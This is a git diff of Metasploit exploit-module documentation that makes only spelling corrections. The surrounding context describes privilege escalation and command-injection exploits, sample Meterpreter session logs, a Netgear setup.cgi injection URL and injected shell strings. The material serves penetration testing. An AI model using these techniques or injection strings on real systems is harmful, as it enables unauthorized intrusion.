with AIX 7.1 and 7.2, and should also work with 6.1. Due to permission restrictions of the crontab in AIX, this module does not use cron, and instead overwrites /etc/passwd in order to create a new user with root privileges. All currently logged in users need to be included when /etc/passwd is overwritten, else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to change user. The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX, and is replaced by '-config', in conjuction with ANSI-C quotes to inject newlines when overwriting /etc/passwd. +This module is a port of the OpenBSD X11 Xorg exploit to run on AIX. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges. This module has been tested with AIX 7.1 and 7.2, and should also work with 6.1. Due to permission restrictions of the crontab in AIX, this module does not use cron, and instead overwrites /etc/passwd in order to create a new user with root privileges. All currently logged in users need to be included when /etc/passwd is overwritten, else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to change user. The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX, and is replaced by '-config', in conjunction with ANSI-C quotes to inject newlines when overwriting /etc/passwd. ## Vulnerable Application diff --git a/documentation/modules/exploit/android/local/put_user_vroot.md b/documentation/modules/exploit/android/local/put_user_vroot.md index 5e13daaf5db3..c36f6c0dad2c 100644 --- a/documentation/modules/exploit/android/local/put_user_vroot.md +++ b/documentation/modules/exploit/android/local/put_user_vroot.md @@ -1,10 +1,10 @@ ## Introduction -This modules exploits a vulnerability in the linux kernel on an Android device, which allows an untrusted app to elevate to root priviledges. On Android an application normally runs as an individual linux user, sandboxing it from the Android system and other applications. After running the exploit the resulting session has full priviledge on the device, and can access the entire filesystem and the private data files of every other app, including system apps. +This modules exploits a vulnerability in the linux kernel on an Android device, which allows an untrusted app to elevate to root privileges. On Android an application normally runs as an individual linux user, sandboxing it from the Android system and other applications. After running the exploit the resulting session has full privileges on the device, and can access the entire filesystem and the private data files of every other app, including system apps. The exploit uses a read kernel memory primitive to first figure out the correct offsets for the device, before using the write primitive to overwrite the ptmx.fsync handler to a function that will elevate the current process to root. Finally /dev/ptmx is opened, and fsync called to trigger the exploit. -This exploit should work on any vulnerable device and is not device specific. In the example below a Samsung Galaxy S4 running Android version 4.3 was targetted. +This exploit should work on any vulnerable device and is not device specific. In the example below a Samsung Galaxy S4 running Android version 4.3 was targeted. ## Usage diff --git a/documentation/modules/exploit/freebsd/webapp/spamtitan_unauth_rce.md b/documentation/modules/exploit/freebsd/webapp/spamtitan_unauth_rce.md index 0f46c22313d2..82ac01dfc7e9 100644 --- a/documentation/modules/exploit/freebsd/webapp/spamtitan_unauth_rce.md +++ b/documentation/modules/exploit/freebsd/webapp/spamtitan_unauth_rce.md @@ -67,7 +67,7 @@ The SNMP Community String to use (random string by default). ### ALLOWEDIP The IP address that will be allowed to query the injected `extend` command. This IP will be added to the SNMP configuration file on the target. This is -tipically this host IP address, but can be different if your are in a NAT'ed +typically this host IP address, but can be different if your are in a NAT'ed network. If not set, `LHOST` will be used instead. If `LHOST` is not set, it will default to `127.0.0.1`. @@ -93,7 +93,7 @@ Module options (exploit/freebsd/webapp/spamtitan_unauth_rce): Name Current Setting Required Description ---- --------------- -------- ----------- - ALLOWEDIP no The IP address that will be allowed to query the injected `extend` command. This IP will be added to the SNMP configuration file on the target. This is tipically this host IP address, but can be different if your are in a NAT'ed network. If not set, `LHOST` will be used instead. If `LHOST` is not set, it will default to `127.0.0.1`. + ALLOWEDIP no The IP address that will be allowed to query the injected `extend` command. This IP will be added to the SNMP configuration file on the target. This is typically this host IP address, but can be different if your are in a NAT'ed network. If not set, `LHOST` will be used instead. If `LHOST` is not set, it will default to `127.0.0.1`. COMMUNITY BTMlXXtt no The SNMP Community String to use (random string by default) Proxies no A proxy chain of format type:host:port[,type:host:port][...] RETRIES 1 yes SNMP Retries @@ -187,7 +187,7 @@ Module options (exploit/freebsd/webapp/spamtitan_unauth_rce): Name Current Setting Required Description ---- --------------- -------- ----------- - ALLOWEDIP no The IP address that will be allowed to query the injected `extend` command. This IP will be added to the SNMP configuration file on the target. This is tipically this host IP address, but can be different if your are in a NAT'ed network. If not set, `LHOST` will be used instead. If `LHOST` is not set, it will default to `127.0.0.1`. + ALLOWEDIP no The IP address that will be allowed to query the injected `extend` command. This IP will be added to the SNMP configuration file on the target. This is typically this host IP address, but can be different if your are in a NAT'ed network. If not set, `LHOST` will be used instead. If `LHOST` is not set, it will default to `127.0.0.1`. COMMUNITY BTMlXXtt no The SNMP Community String to use (random string by default) Proxies no A proxy chain of format type:host:port[,type:host:port][...] RETRIES 1 yes SNMP Retries @@ -271,7 +271,7 @@ Module options (exploit/freebsd/webapp/spamtitan_unauth_rce): Name Current Setting Required Description ---- --------------- -------- ----------- - ALLOWEDIP no The IP address that will be allowed to query the injected `extend` command. This IP will be added to the SNMP configuration file on the target. This is tipically this host IP address, but can be different if your are in a NAT'ed network. If not set, `LHOST` will be used instead. If `LHOST` is not set, it will default to `127.0.0.1`. + ALLOWEDIP no The IP address that will be allowed to query the injected `extend` command. This IP will be added to the SNMP configuration file on the target. This is typically this host IP address, but can be different if your are in a NAT'ed network. If not set, `LHOST` will be used instead. If `LHOST` is not set, it will default to `127.0.0.1`. COMMUNITY BTMlXXtt no The SNMP Community String to use (random string by default) Proxies no A proxy chain of format type:host:port[,type:host:port][...] RETRIES 1 yes SNMP Retries diff --git a/documentation/modules/exploit/linux/http/alienvault_exec.md b/documentation/modules/exploit/linux/http/alienvault_exec.md index 1ed659c7bab4..6f9d5e9cc08f 100644 --- a/documentation/modules/exploit/linux/http/alienvault_exec.md +++ b/documentation/modules/exploit/linux/http/alienvault_exec.md @@ -48,7 +48,7 @@ msf exploit(alienvault_exec) > exploit [*] Activating the policy [+] Rogue policy activated [*] Triggering the policy by performing SSH login attempt -[+] SSH - Failed authentication. That means our policy and action will be trigged..! +[+] SSH - Failed authentication. That means our policy and action will be triggered..! [*] Sending stage (38500 bytes) to 12.0.0.137 [*] Meterpreter session 6 opened (12.0.0.1:4445 -> 12.0.0.137:51674) at 2017-01-31 14:13:49 +0300 diff --git a/documentation/modules/exploit/linux/http/cisco_rv32x_rce.md b/documentation/modules/exploit/linux/http/cisco_rv32x_rce.md index 277ae10d3dcd..8ba14226ef47 100644 --- a/documentation/modules/exploit/linux/http/cisco_rv32x_rce.md +++ b/documentation/modules/exploit/linux/http/cisco_rv32x_rce.md @@ -139,7 +139,7 @@ msf5 exploit(linux/http/cisco_rv32x_rce) > run [*] Using SSL connection to router. [*] Successfully downloaded config [*] Got MD5-Hash: dfead10390e560aea745ccba53e044ed -[*] Loging in as user cisco using password hash. +[*] Logging in as user cisco using password hash. [*] Using default auth_key 1964300002 [*] Successfully logged in as user cisco. [*] Got cookies: mlap=RGVmYXVsdDE6Ojo6Y2lzY28=; diff --git a/documentation/modules/exploit/linux/http/cpi_tararchive_upload.md b/documentation/modules/exploit/linux/http/cpi_tararchive_upload.md index bf22db35c2f9..323d8d77915a 100644 --- a/documentation/modules/exploit/linux/http/cpi_tararchive_upload.md +++ b/documentation/modules/exploit/linux/http/cpi_tararchive_upload.md @@ -8,7 +8,7 @@ Cisco Prime Infrastructure releases prior to 3.4.1, 3.5, and 3.6, also EPN Manag ## Notes on Setup -While developing the exploit, I happended to run into several issues that made the process more difficut. It was really because I didn't have the best hardware to work with, but in case you are trying to set up Cisco Prime Infrastructure as VMs like me, you may want to read this first. +While developing the exploit, I happened to run into several issues that made the process more difficut. It was really because I didn't have the best hardware to work with, but in case you are trying to set up Cisco Prime Infrastructure as VMs like me, you may want to read this first. Special thanks to Steven Seeley (mr_me) for providing some of the most important setup notes himself. diff --git a/documentation/modules/exploit/linux/http/denyall_waf_exec.md b/documentation/modules/exploit/linux/http/denyall_waf_exec.md index c41efa6ae188..f33164803825 100644 --- a/documentation/modules/exploit/linux/http/denyall_waf_exec.md +++ b/documentation/modules/exploit/linux/http/denyall_waf_exec.md @@ -37,7 +37,7 @@ msf exploit(denyall_exec) > exploit [*] Started reverse TCP handler on 35.12.3.3:4444 [*] Extracting iToken value from unauthenticated accessible endpoint. [+] Awesome. iToken value = n84b214ad1f53df0bd6ffa3dcfe8059a -[*] Trigerring command injection vulnerability with iToken value. +[*] Triggering command injection vulnerability with iToken value. [*] Sending stage (40411 bytes) to 35.176.123.128 [*] Meterpreter session 1 opened (35.176.123.128:4444 -> 35.12.3.3:60556) at 2017-09-19 14:31:52 +0300 diff --git a/documentation/modules/exploit/linux/http/dlink_dwl_2600_command_injection.md b/documentation/modules/exploit/linux/http/dlink_dwl_2600_command_injection.md index 00a6947bb657..5f3ddaf25353 100644 --- a/documentation/modules/exploit/linux/http/dlink_dwl_2600_command_injection.md +++ b/documentation/modules/exploit/linux/http/dlink_dwl_2600_command_injection.md @@ -7,7 +7,7 @@ DLINK DWL-2600 WiFi Access Points contain an authenticated command injection vul ### HttpUsername Defaults to admin, this is the username that is used to authenticate to the device ### HttpPassword -Defaults to admin, this is hte password that is used to authenticate to the device +Defaults to admin, this is the password that is used to authenticate to the device ### DOWNHOST Alternative host to request MIPS payload from. ### DOWNFILE diff --git a/documentation/modules/exploit/linux/http/fortinet_authentication_bypass_cve_2022_40684.md b/documentation/modules/exploit/linux/http/fortinet_authentication_bypass_cve_2022_40684.md index ee9f10d0f26c..0e30496292a2 100644 --- a/documentation/modules/exploit/linux/http/fortinet_authentication_bypass_cve_2022_40684.md +++ b/documentation/modules/exploit/linux/http/fortinet_authentication_bypass_cve_2022_40684.md @@ -19,7 +19,7 @@ The following products are affected: ### Exploitation This module will abuse the authentication bypass vulnerability in the affected products to add a new ssh public -key in the authorized keys of the target user (if no user is provied it'll try to detect it) and then connect +key in the authorized keys of the targeted user (if no user is provided it'll try to detect it) and then connect over ssh to the target system (if no ssh private key is provided this module will automatically generate one). To do so it will add the following header in all HTTP requests: @@ -55,7 +55,7 @@ The path to the Fotigate API (Default: `/`). ### USERNAME (required) -The username of the targed user (Default: `admin`). +The username of the target user (Default: `admin`). ### PRIVATE_KEY (optional) @@ -72,7 +72,7 @@ The password for a given SSH private key (if it has one). ### SSH_RPORT (required) -The SSH port to connnect to (Default: `22`) +The SSH port to connect to (Default: `22`) ## Scenarios diff --git a/documentation/modules/exploit/linux/http/froxlor_log_path_rce.md b/documentation/modules/exploit/linux/http/froxlor_log_path_rce.md index 5153193b803f..d4bd67d6365e 100644 --- a/documentation/modules/exploit/linux/http/froxlor_log_path_rce.md +++ b/documentation/modules/exploit/linux/http/froxlor_log_path_rce.md @@ -76,7 +76,7 @@ msf6 exploit(linux/http/froxlor_log_path_rce) > rexploit [+] CSRF token is : 5701b7e6335ab13e20e91845b210b6be0bea7621 [+] Changed logfile path to: /var/www/html/froxlor/templates/Froxlor/footer.html.twig [*] Using URL: http://172.16.199.1:8080/ygs3pAWMRNIs -[+] Injected payload sucessfully +[+] Injected payload successfully [*] Changing logfile path back to default value while triggering payload: /var/www/html/froxlor/logs/froxlor.log [*] Client 172.16.199.140 (Wget/1.20.3 (linux-gnu)) requested /ygs3pAWMRNIs [*] Sending payload to 172.16.199.140 (Wget/1.20.3 (linux-gnu)) diff --git a/documentation/modules/exploit/linux/http/goahead_ldpreload.md b/documentation/modules/exploit/linux/http/goahead_ldpreload.md index 7f104754c3d5..e810d8accd95 100644 --- a/documentation/modules/exploit/linux/http/goahead_ldpreload.md +++ b/documentation/modules/exploit/linux/http/goahead_ldpreload.md @@ -7,7 +7,7 @@ ### Kali 2017.3 and Ubuntu 16.04 Install Instructions -These instructions are based on the vulerability analysis by [elttam.com.au](https://www.elttam.com.au/blog/goahead/) +These instructions are based on the vulnerability analysis by [elttam.com.au](https://www.elttam.com.au/blog/goahead/) ``` git clone https://github.com/embedthis/goahead.git diff --git a/documentation/modules/exploit/linux/http/grandstream_ucm62xx_sendemail_rce.md b/documentation/modules/exploit/linux/http/grandstream_ucm62xx_sendemail_rce.md index 7e305e913a17..2a52483dd80a 100644 --- a/documentation/modules/exploit/linux/http/grandstream_ucm62xx_sendemail_rce.md +++ b/documentation/modules/exploit/linux/http/grandstream_ucm62xx_sendemail_rce.md @@ -58,7 +58,7 @@ Specifies base URI. The default value is `/`. ## Scenarios -### Grandstream UCM6202 IP PBX fimrware version 1.0.18.13. Get Meterpreter session. +### Grandstream UCM6202 IP PBX firmware version 1.0.18.13. Get Meterpreter session. ``` msf6 > use exploit/linux/http/grandstream_ucm62xx_sendemail_rce diff --git a/documentation/modules/exploit/linux/http/huawei_hg532n_cmdinject.md b/documentation/modules/exploit/linux/http/huawei_hg532n_cmdinject.md index 1a832beb93b1..b543d6eace49 100644 --- a/documentation/modules/exploit/linux/http/huawei_hg532n_cmdinject.md +++ b/documentation/modules/exploit/linux/http/huawei_hg532n_cmdinject.md @@ -133,7 +133,7 @@ Password:' [*] Received new reply token = 'Success ping result: HG520b>' -[+] Command executed succesfully +[+] Command executed successfully [*] Runninig command on target: chmod 777 /tmp/zjtmztfz [*] Received new reply token = 'p' [*] Received new reply token = 'ing ?;chmod${IFS}777${IFS}/tmp/zjtmztfz;trueping: bad address '?' @@ -141,7 +141,7 @@ HG520b>' Success ping result: HG520b>' -[+] Command executed succesfully +[+] Command executed successfully [*] Runninig command on target: /tmp/zjtmztfz [*] Received new reply token = 'p' [*] Received new reply token = 'ing ?;/tmp/zjtmztfz&trueping: bad address '?' @@ -149,7 +149,7 @@ HG520b>' Success ping result: HG520b>' -[+] Command executed succesfully +[+] Command executed successfully [*] Runninig command on target: rm /tmp/zjtmztfz [*] Received new reply token = 'p' [*] Received new reply token = 'ing ?;rm${IFS}/tmp/zjtmztfz;trueping: bad address '?' @@ -157,7 +157,7 @@ HG520b>' Success ping result: HG520b>' -[+] Command executed succesfully +[+] Command executed successfully [*] Waiting for the payload to connect back .. [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 197.38.98.11:50097) at 2017-04-15 16:45:05 +0200 [+] Payload connected! diff --git a/documentation/modules/exploit/linux/http/kaltura_unserialize_rce.md b/documentation/modules/exploit/linux/http/kaltura_unserialize_rce.md index 042db08cf734..0dcdaf7a5839 100644 --- a/documentation/modules/exploit/linux/http/kaltura_unserialize_rce.md +++ b/documentation/modules/exploit/linux/http/kaltura_unserialize_rce.md @@ -112,7 +112,7 @@ Confirm passwd: "" Your time zone [see http://php.net/date.timezone], or press enter for [Europe/Amsterdam]: "" How would you like to name your system (this name will show as the From field in emails sent by the system) [Kaltura Video Platform]? "" Your website Contact Us URL [http://corp.kaltura.com/company/contact-us]: "" -'Contact us' phone number [+1 800 871 5224]? "" +'Contact us' phone number [+1 800 871 5224]? "" Is your Apache working with SSL?[Y/n] "" It is recommended that you do work using HTTPs. Would you like to continue anyway?[N/y] "" diff --git a/documentation/modules/exploit/linux/http/lexmark_faxtrace_settings.md b/documentation/modules/exploit/linux/http/lexmark_faxtrace_settings.md index a7128b44bd69..50a16f89afbb 100644 --- a/documentation/modules/exploit/linux/http/lexmark_faxtrace_settings.md +++ b/documentation/modules/exploit/linux/http/lexmark_faxtrace_settings.md @@ -9,7 +9,7 @@ used in an bash eval statement: `eval "$cmd" > /dev/null`, allowing for an unaut ### Installation Steps -Testing of this module was preformed on a physical device. Emulating firmware through qemu or similar methods have not +Testing of this module was performed on a physical device. Emulating firmware through qemu or similar methods have not been explored. ### Affected Models diff --git a/documentation/modules/exploit/linux/http/microfocus_obr_cmd_injection.md b/documentation/modules/exploit/linux/http/microfocus_obr_cmd_injection.md index 1397de8c12e7..12cc656810d8 100644 --- a/documentation/modules/exploit/linux/http/microfocus_obr_cmd_injection.md +++ b/documentation/modules/exploit/linux/http/microfocus_obr_cmd_injection.md @@ -12,7 +12,7 @@ Installation docs are available at: Vulnerable versions of the software can be downloaded from Micro Focus website by requesting a demo. This vulnerability only affects Linux installations. -All details about this vulnerabilitu can be obtained from the advisory: +All details about this vulnerability can be obtained from the advisory: * https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md diff --git a/documentation/modules/exploit/linux/http/mobileiron_core_log4shell.md b/documentation/modules/exploit/linux/http/mobileiron_core_log4shell.md index 9a087dab1436..27e7a1130629 100644 --- a/documentation/modules/exploit/linux/http/mobileiron_core_log4shell.md +++ b/documentation/modules/exploit/linux/http/mobileiron_core_log4shell.md @@ -30,7 +30,7 @@ so that I can hit it over the network. 15. Assign a static IP address and network mask that works with your test network. (e.g. `10.9.49.101` and `255.255.255.0`) 16. Enter your test networks default gateway (e.g. `10.9.49.1`) 17. Enter a fully-qualified domain name for the device (e.g. `lobster.example.com`). Unfortunately, this needs to work. I added a -static DNS enty to my lab network's router. +static DNS entry to my lab network's router. 18. Enter your desired name server. My lab network relies on the aforementioned router (e.g. `10.9.49.1`) 19. Enter blank entries for name server 2 and 3. 20. `yes` to enable remote shell access (why not, right?) diff --git a/documentation/modules/exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.md b/documentation/modules/exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.md index 22e51af1d37e..90beded1b900 100644 --- a/documentation/modules/exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.md +++ b/documentation/modules/exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.md @@ -280,7 +280,7 @@ msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > run [+] The target appears to be vulnerable. [*] Uploading malicious 'check_ping' plugin... [*] Command Stager progress - 100.00% done (897/897 bytes) -[!] For NagiosXi version 5.3.0 it may take serveral minutes for a session to open. If the module times out, try increasing the `WfsDelay` value. +[!] For NagiosXi version 5.3.0 it may take several minutes for a session to open. If the module times out, try increasing the `WfsDelay` value. [+] Successfully uploaded plugin. [*] Executing plugin... [*] Waiting up to 300 seconds for the plugin to request the final payload... diff --git a/documentation/modules/exploit/linux/http/netgear_dgn1000_setup_unauth_exec.md b/documentation/modules/exploit/linux/http/netgear_dgn1000_setup_unauth_exec.md index 93e8f65346c7..c1c68d79711e 100644 --- a/documentation/modules/exploit/linux/http/netgear_dgn1000_setup_unauth_exec.md +++ b/documentation/modules/exploit/linux/http/netgear_dgn1000_setup_unauth_exec.md @@ -1,4 +1,4 @@ -The module netgear_dgn1000_setup_unauth_exec exploits an unauthenticated OS command injection vulnerability in vulnerable Netgear DGN1000 with firmware versions up to `1.1.00.48` in addition to DGN2000v1 models, all firmware versions. The vulnerability occurs in within the `syscmd` fuction of the `setup.cgi` script to execute arbitrary commands. Manual exploitation could be completed through the browser, as for example : `http:///setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=echo+vulnerable&curpath=/¤tsetting.htm=1`. Such example will return "vulnerable" on the page. Vulnerable models have `wget` installed on `/usr/bin/wget` and can be leveraged to drop a MIPS Big Endian payload. +The module netgear_dgn1000_setup_unauth_exec exploits an unauthenticated OS command injection vulnerability in vulnerable Netgear DGN1000 with firmware versions up to `1.1.00.48` in addition to DGN2000v1 models, all firmware versions. The vulnerability occurs in within the `syscmd` function of the `setup.cgi` script to execute arbitrary commands. Manual exploitation could be completed through the browser, as for example : `http:///setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=echo+vulnerable&curpath=/¤tsetting.htm=1`. Such example will return "vulnerable" on the page. Vulnerable models have `wget` installed on `/usr/bin/wget` and can be leveraged to drop a MIPS Big Endian payload. ## Vulnerable Application @@ -15,7 +15,7 @@ Netgear DGN1000 with firmware versions up to `1.1.00.48` and DGN2000v1 models ## Scenarios -Sample output of a successfull exploitation should be look like this : +Sample output of a successful exploitation should be look like this : ``` msf > use exploit/linux/http/netgear_dgn1000_setup_unauth_exec diff --git a/documentation/modules/exploit/linux/http/rconfig_ajaxarchivefiles_rce.md b/documentation/modules/exploit/linux/http/rconfig_ajaxarchivefiles_rce.md index 005a477dbb26..8e5c102b50e2 100644 --- a/documentation/modules/exploit/linux/http/rconfig_ajaxarchivefiles_rce.md +++ b/documentation/modules/exploit/linux/http/rconfig_ajaxarchivefiles_rce.md @@ -60,7 +60,7 @@ msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce) > [+] New temporary user 6QpO8mLt created [+] Authenticated as user 6QpO8mLt [*] Command shell session 1 opened (1.1.1.2:4444 -> 1.1.1.1:34586) at 2020-03-10 22:26:46 +0100 -[+] Command sucessfully executed +[+] Command successfully executed [*] User 6QpO8mLt removed successfully ! msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce) > sessions -i 1 diff --git a/documentation/modules/exploit/linux/http/samsung_srv_1670d_upload_exec.md b/documentation/modules/exploit/linux/http/samsung_srv_1670d_upload_exec.md index ce5718cb4477..1b8c0829d919 100644 --- a/documentation/modules/exploit/linux/http/samsung_srv_1670d_upload_exec.md +++ b/documentation/modules/exploit/linux/http/samsung_srv_1670d_upload_exec.md @@ -38,7 +38,7 @@ network_ssl_upload.php: ``` To avoid the need of authentication, the exploit also takes advantage of another vulnerability -(CVE-2015-8279) in the log exporting function to read an aribtrary file from the remote machine +(CVE-2015-8279) in the log exporting function to read an arbitrary file from the remote machine in order to obtain credentials that can be used for the attack. ## Vulnerable Application diff --git a/documentation/modules/exploit/linux/http/synology_dsm_smart_exec_auth.md b/documentation/modules/exploit/linux/http/synology_dsm_smart_exec_auth.md index 631dda727385..893a2492b757 100644 --- a/documentation/modules/exploit/linux/http/synology_dsm_smart_exec_auth.md +++ b/documentation/modules/exploit/linux/http/synology_dsm_smart_exec_auth.md @@ -12,7 +12,7 @@ restriction, a wget input file is staged in /a, and executed to download our pay to /b. From there the payload is executed. A wfsdelay is required to give time for the payload to download, and the execution of it to run. -A more detailed explination of exploitation steps: +A more detailed explanation of exploitation steps: 1. We first clean the env by deleting `/a`, and `b` 2. we use `echo -n` to append our IP:PORT for our staging server to `/a`. This is diff --git a/documentation/modules/exploit/linux/http/totolink_unauth_rce_cve_2023_30013.md b/documentation/modules/exploit/linux/http/totolink_unauth_rce_cve_2023_30013.md index 8c6d7947b45a..7d02a96fac38 100644 --- a/documentation/modules/exploit/linux/http/totolink_unauth_rce_cve_2023_30013.md +++ b/documentation/modules/exploit/linux/http/totolink_unauth_rce_cve_2023_30013.md @@ -43,7 +43,7 @@ This module has been tested on: * Download the vulnerable firmware from [TOTOLINK](https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/218/ids/36.html). * We need `X5000R_V9.1.0u.6118_B20201102.zip`. * Start emulation. -* First run `./init.sh` to initialize and start the Postgress database. +* First run `./init.sh` to initialize and start the Postgresql database. * Start a debug session `./run.sh -d TOTOLINK X5000R_V9.1.0u.6118_B20201102.zip`. * This will take a while, but in the end you should see the following... diff --git a/documentation/modules/exploit/linux/http/trendmicro_imsva_widget_exec.md b/documentation/modules/exploit/linux/http/trendmicro_imsva_widget_exec.md index 5fd47c1b72c4..5f9f96369f38 100644 --- a/documentation/modules/exploit/linux/http/trendmicro_imsva_widget_exec.md +++ b/documentation/modules/exploit/linux/http/trendmicro_imsva_widget_exec.md @@ -52,7 +52,7 @@ msf exploit(trendmicro_imsva_widget_exec) > exploit [+] Awesome. JSESSIONID value = 0567E974AE729E58178C9B513FEBE41E [*] Initiating session with widget framework [+] Session with widget framework successfully initiated. -[*] Trigerring command injection vulnerability +[*] Triggering command injection vulnerability [*] Command shell session 1 opened (12.0.0.1:4444 -> 12.0.0.201:44103) at 2017-10-08 18:05:11 +0300 pwd diff --git a/documentation/modules/exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.md b/documentation/modules/exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.md index 5bbdfabdf01e..1123f65c15d2 100644 --- a/documentation/modules/exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.md +++ b/documentation/modules/exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.md @@ -21,7 +21,7 @@ Follow these instructions to install a vulnerable VMware NSX Manager on VirtualB * Note: You need to be a customer with valid VMware subscriptions * Download the ova file `VMware-NSX-Manager-6.4.13-19307994.ova` * Open VirtualBox and import the ova file -* After sucessful import, start the VM and you have a VMware NSX Manager running which is accessible using url `https://` +* After successful import, start the VM and you have a VMware NSX Manager running which is accessible using url `https://` * Credentials to login: user: `admin`, password: `default` * Use the module and options below to test the vulnerability... diff --git a/documentation/modules/exploit/linux/http/wd_mycloud_unauthenticated_cmd_injection.md b/documentation/modules/exploit/linux/http/wd_mycloud_unauthenticated_cmd_injection.md index 5eeb507e69a7..ace77343ae65 100644 --- a/documentation/modules/exploit/linux/http/wd_mycloud_unauthenticated_cmd_injection.md +++ b/documentation/modules/exploit/linux/http/wd_mycloud_unauthenticated_cmd_injection.md @@ -5,7 +5,7 @@ Western Digital MyCloud before 2.30.196 in order to achieve unauthenticated remo The module first performs a check to see if the target is WD MyCloud. If so, it attempts to trigger an authentication bypass (CVE-2018-17153) via a crafted GET request to /cgi-bin/network_mgr.cgi. If the server responds as expected (with a 404 response), the module assesses the vulnerability status by attempting to exploit -a commend injection vulnerability (CVE-2016-10108) in order to print a random string via the echo command. +a command injection vulnerability (CVE-2016-10108) in order to print a random string via the echo command. This is done via a crafted POST request to /web/google_analytics.php where the command is injected into the `arg` POST parameter. If the server is vulnerable, the same command injection vector is leveraged to execute the payload. @@ -27,7 +27,7 @@ https://www.securify.nl/advisory/authentication-bypass-vulnerability-in-western- ## Installation Information Western Digital no longer seems to offer older firmware versions for download to non-customers. -[This commnity post](https://community.wd.com/t/wd-my-cloud-v3-x-v4-x-and-v2-x-firmware-versions-download-links/148533) +[This community post](https://community.wd.com/t/wd-my-cloud-v3-x-v4-x-and-v2-x-firmware-versions-download-links/148533) contains download links to older firmware versions as well as to the source code, but only the links to the source code still work. ## Verification Steps diff --git a/documentation/modules/exploit/linux/http/xplico_exec.md b/documentation/modules/exploit/linux/http/xplico_exec.md index cf1192201147..fc5093ccf246 100644 --- a/documentation/modules/exploit/linux/http/xplico_exec.md +++ b/documentation/modules/exploit/linux/http/xplico_exec.md @@ -4,11 +4,11 @@ This module exploits command injection vulnerability. Unauthenticated users can The specific flaw exists within the Xplico, which listens on TCP port 9876 by default. The goal of Xplico is extract from an internet traffic capture the applications data contained. There is a hidden end-point at inside of the Xplico that allow anyone to create a new user. Once the user created through /users/register endpoint, it must be activated via activation e-mail. After the registration Xplico try -to send e-mail that contains activation code. Unfortunetly, this e-mail probably not gonna reach to the given e-mail address on most of installation. +to send e-mail that contains activation code. Unfortunately, this e-mail probably not gonna reach to the given e-mail address on most of installation. But it's possible to calculate exactly same token value because of insecure cryptographic random string generator function usage. One of the feature of Xplico is related to the parsing PCAP files. Once PCAP file uploaded, Xplico execute an operating system command in order to calculate checksum -of the file. Name of the for this operation is direclty taken from user input and then used at inside of the command without proper input validation. +of the file. Name of the for this operation is directly taken from user input and then used at inside of the command without proper input validation. **Vulnerable Application Installation Steps** @@ -72,9 +72,9 @@ msf exploit(securityonion_xplico_exec) > exploit [*] Authenticating with our activated new user [+] Successfully authenticated [*] Creating new case -[+] New Case successfully creted. Our pol_id = 36 +[+] New Case successfully created. Our pol_id = 36 [*] Creating new xplico session for pcap -[+] New Sols successfully creted. Our sol_id = 54 +[+] New Sols successfully created. Our sol_id = 54 [*] Uploading malformed PCAP file [+] PCAP successfully uploaded. Pcap parser is going to start on server side. [*] Parsing has started. Wait for parser to get the job done... diff --git a/documentation/modules/exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec.md b/documentation/modules/exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec.md index 1a17ee5b2e4f..09a1a66ea897 100644 --- a/documentation/modules/exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec.md +++ b/documentation/modules/exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec.md @@ -169,7 +169,7 @@ We can do this by creating a folder in the `PATH` called `GCONV_PATH=.` and with file named `abc`. We also add the directory `GCONV_PATH` to the `PATH` environment variable. Now, when we launch pkexec without any arguments, but with `abc` as the first environment variable and `PATH=GCONV_PATH=` as the second, `g_find_program_in_path` will look for `abc` in the folder `GCONV_PATH=.` and find it. -It will then overwrite the first environment variable withe the full path to the file as it exists in +It will then overwrite the first environment variable with the full path to the file as it exists in our PATH: `GCONV_PATH=./abc` or exactly what we'd like to have as our environment variable. Now, if we can coerce pkexec to use an unknown charset, it will load the library `./abc.so` which we'll make the name of our payload. @@ -204,7 +204,7 @@ Once `g_find_program_in_path` runs, the environment variables will be changed to `CHARSET=garbage` -The result will be that pkexec errors while trying to encode test to the non-existant charset, causing it to +The result will be that pkexec errors while trying to encode test to the non-existent charset, causing it to load the provided abc.so file in the root context. ## Verification diff --git a/documentation/modules/exploit/linux/local/cve_2022_0995_watch_queue.md b/documentation/modules/exploit/linux/local/cve_2022_0995_watch_queue.md index 9478296bc675..0e0f49950d98 100644 --- a/documentation/modules/exploit/linux/local/cve_2022_0995_watch_queue.md +++ b/documentation/modules/exploit/linux/local/cve_2022_0995_watch_queue.md @@ -4,7 +4,7 @@ This module exploits a vulnerability in the Linux Kernel's watch_queue event notification system. It relies on a heap out-of-bounds write in kernel memory. The exploit may fail on the first attempt so multiple attempts may be needed. Note that the exploit can potentially cause a denial of service if multiple -failed attemps occur, however this is unlikely. +failed attempts occur, however this is unlikely. ### Install diff --git a/documentation/modules/exploit/linux/local/docker_runc_escape.md b/documentation/modules/exploit/linux/local/docker_runc_escape.md index f978b66066b9..68b82807749a 100644 --- a/documentation/modules/exploit/linux/local/docker_runc_escape.md +++ b/documentation/modules/exploit/linux/local/docker_runc_escape.md @@ -82,7 +82,7 @@ cp ### OVERWRITE -The shell that is going to be overwriten with `#!/proc/self/exe`. This will be +The shell that is going to be overwritten with `#!/proc/self/exe`. This will be triggered by a user running `docker exec -ti `. Default is `/bin/sh`. diff --git a/documentation/modules/exploit/linux/local/juju_run_agent_priv_esc.md 